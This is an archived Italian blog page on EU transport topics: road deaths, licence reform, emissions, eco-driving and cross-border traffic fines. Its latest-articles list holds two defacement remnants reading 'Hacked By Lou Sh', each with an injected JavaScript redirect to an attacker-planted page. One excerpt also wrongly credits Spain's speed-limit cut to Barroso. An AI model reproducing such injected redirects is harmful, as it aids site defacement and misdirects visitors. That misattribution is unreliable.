EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Sicurezza stradale

Sicurezza stradale


Sicurezza stradale

it

La sicurezza stradale in Unione europea sembra una scommessa vicina alla vittoria: secondo i dati preliminari relativi al 2013 pubblicati dalla Commissione europea, infatti, si è registrata una sensibile diminuzione del numero di morti sulle strade europee per il secondo anno di fila. Si avvicina sempre più, dunque, l’obiettivo fissato nel 2010: dimezzare il numero di vittime stradali entro il 2020.

Dopo la decrescita lenta registrata nel 2011, il 2012 e il 2013 hanno registrato una generale diminuzione del numero di vittime delle strade. In particolare, nel 2013 sono stati segnalati poco più di 26.000 decessi in Ue, con una diminuzione di circa l’8% rispetto al 2012. Registrare numeri (...)

it

Il numero delle vittime a causa di incidenti stradali nel 2012 è diminuito sensibilmente soprattutto in riferimento al 2011 in cui c’era stata solamente una diminuzione del 2%. Nel 2012 invece si è registrato un traguardo veramente soddisfacente: ben il 9% in meno di incidenti sulle strade dei paesi membri dell’Ue. Il numero di vittime si diversifica nei vari paesi europei, si è registrato però che i paesi che hanno subito meno incidenti stradali (30 decessi per ogni milione di abitanti) sono la Svezia, il Regno Unito, la Danimarca e i Paesi Bassi.

L’obiettivo che l’Ue si prefissa di raggiungere entro il 2020 è la diminuzione annua costante del 7% degli incidenti stradali. Le vittime che purtroppo più spesso sono coinvolte negli incidenti sono le fasce più fragili della popolazione quali anziani, pedoni e motociclisti. Il progetto sulla (...)

it

Il 19 gennaio 2013 è entrato in vigore il Decreto legislativo 59/2011 che modifica drasticamente le regole per conseguire la patente. Per quelle patenti che si hanno in possesso al periodo precedente il 19 gennaio 2013 cambiano i limiti di età, mentre per coloro che ancora la devono conseguire sono in atto parecchie novità.

La patente, che verrà rilasciata dall’Ue, avrà la forma di una carta di credito in materiale plastico che conterrà lo spazio all’interno del quale verrà posta la foto di riconoscimento, delle informazioni utili all’interno dell’Unione Europea che dovranno essere di facile lettura ed un microchip (...)

it

La maggiore preoccupazione dell'Unione europea riguarda le emissioni delle auto, le quali vanno a peggiorare le già precarie condizioni dell'ambiente in cui viviamo. In particolare le nuove automobili dovranno essere equipaggiate con degli indicatori di cambio di marcia, che andranno in aiuto degli automobilisti nel momento in cui questi dovranno cambiare marcia, in modo da ridurre in primis le emissioni di CO2 e poi per fornire un sostegno nell'ambito dei consumi.

L’Europa che conta ha finalmente fatto la voce grossa in ambito automobilistico. Molti problemi sorgono ogni anno, altri sicuramente ne nasceranno, intanto però l’UE ha deciso di dare una svolta alla produzione dei nuovi autoveicoli, fornendo precise indicazioni e dettagliate spiegazioni ai (...)

it

Josephin, Julian, Federico. Le vite di questi ragazzi segnano il filo rosso lungo in quale scorrono le sequenze che compongono “Young Europe”. Il film, diretto da Matteo Vicino, è stato presentato lo scorso luglio al Giffoni Film Festival. “Young Europe” potrebbe a prima vista sembrare uno di quei tanti film corali sulla giovinezza, che riempiono le nostre sale cinematografiche. Ma non è affatto come sembra.

La genesi del film è piuttosto articolata. Il lungometraggio, vincitore tra l’altro del premio alla Miglior Regia all’interno del Film Festival Internazionale di Milano (MIFF), è la trasposizione cinematografica del libro omonimo, di cui è autore lo stesso Vicino. Il volume (edito nel 2010 da (...)

it

È di questi giorni la notizia che in Spagna il Presidente Barroso ha deciso di abbassare a 110 km/h il limite sulle autostrade del Paese. A spingerlo a prendere questa decisione non sono stati, questa volta, motivi legati alla sicurezza. Il governo spagnolo avrebbe individuato nella riduzione della velocità l’unico sistema per combattere l’inquinamento e consumare meno carburante, conservando quanto più petrolio possibile, data anche le delicata situazione libica. Questo è il modello di Eco-Drive iberico. Ma qual è la situazione in generale in UE e in Italia? Vediamolo insieme.

Cos’è l’Eco-Drive?

L’Eco-Drive è un stile di guidare che riduce il consumo di benzina e, conseguentemente, le emissioni di gas nocivo nell’atmosfera, ed ha effetti positivi anche su (...)

it

La Commissione europea ha stanziato 170 milioni di euro per rilanciare le infrastrutture continentali ed intraprendere una direzione più ecologica per le reti dei trasporti.

Oggi Bruxelles sembra riaprire il discorso di mcluhaniana memoria del villaggio globale: la Commissione ha pubblicato l’elenco dei 51 progetti che beneficeranno dei fondi per migliorare le reti transeuropee dei trasporti(TEN-T, uno dei mezzi più importanti di finanziamento delle infrastrutture). (...)

it

È stato raggiunto nella riunione tenutasi lo scorso 2 dicembre a Bruxelles un accordo tra i ministri dei trasporti dei Paesi UE riguardo le sanzioni da infliggere a quei cittadini colti nel violare il codice della strada in uno stato diverso dal proprio. Il vicepresidente della Commissione Sim Kallas ha mostrato la sua soddisfazione per questa intesa di massima, sottolineando inoltre l’interesse dell’ UE per un simile argomento: dati alla mano, il 5% dei conducenti sul territorio sono stranieri, ma rappresentano anche il 15% delle infrazioni commesse. Matematica insegna che quindi un cittadino straniero al volante ha il triplo di probabilità di violare il codice della strada rispetto ad uno residente.

Non è però questo il primo intervento assoluto dell’Unione riguardo questa tematica. Sanzioni riguardo le infrazioni al codice della strada si possono infatti trovare all’interno di una precedente decisione del Consiglio sul riconoscimento delle sanzioni pecuniarie reciproche in generale tra i (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato




Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France